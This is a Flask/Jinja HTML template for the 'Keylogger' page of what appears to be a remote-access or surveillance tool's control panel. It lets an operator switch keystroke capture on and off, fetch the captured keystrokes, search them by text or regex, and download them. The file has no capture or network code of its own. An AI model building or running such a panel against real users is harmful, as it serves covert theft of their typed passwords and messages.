{% extends "base.html" %}
{% block content %}
<h1>⌨️ Keylogger</h1>

<div class="keylog-box">
    <pre>{{ keylog_data }}</pre>
</div>

<!-- Controls -->
<span class="flex-row" id="main-klg-div">
    <div class="status-card flex-col" id="left-col">
        <label id="fetchLabel">
            <span id="send-mode-span">
                <p>State:</p>
                <div class="toggle-container on-off-slider">
                    <span class="toggle-label toggle-left">OFF</span>
                    <label class="switch">
                        <input 
                            type="checkbox" 
                            id="channelToggle" 
                            {% if klg_on %}checked{% endif %}
                        >
                        <span class="slider round"></span>
                    </label>
                    <span class="toggle-label toggle-right">ON</span>
                    <input type="hidden" id="channelInput" name="channel" value="OFF">
                </div>
            </span>
        </label>
        <button type="button" onclick="fetchKeyloggerData()" id="fetch-button">
            <p class="loader-btn">🗘</p>
            <p id="loader-btn-text">Fetch data</p>
        </button>
    </div>

    <div class="status-card flex-col" id="right-col">
        <input type="text" id="searchInput" placeholder="Search...">
        <label>
            <label id="regexLabel">
                <span id="regex-mode-span">
                    <div class="toggle-container">
                        <span class="toggle-label toggle-left">Normal</span>
                        <label class="switch">
                            <input 
                                type="checkbox" 
                                id="regexToggle" 
                            >
                            <span class="slider round"></span>
                        </label>
                        <span class="toggle-label toggle-right">RegEx</span>
                        <input type="hidden" id="regexInput" name="regex" value="Normal">
                    </div>
                    <button onclick="updateSearchResults()" id="klg-search-btn">Search</button>
                </span>
            </label>
        </label>
    </div>

</span>

<div class="status-card" id="klg-results-block">
    <pre id="textDisplay" readonly></pre>
    <button style="margin-top: 10px;" onclick="downloadText()">Download as .txt</button>
</div>


<!-- Scripts -->
<script src="{{ url_for('static', filename='js/keylogger.js') }}"></script>

{% endblock %}
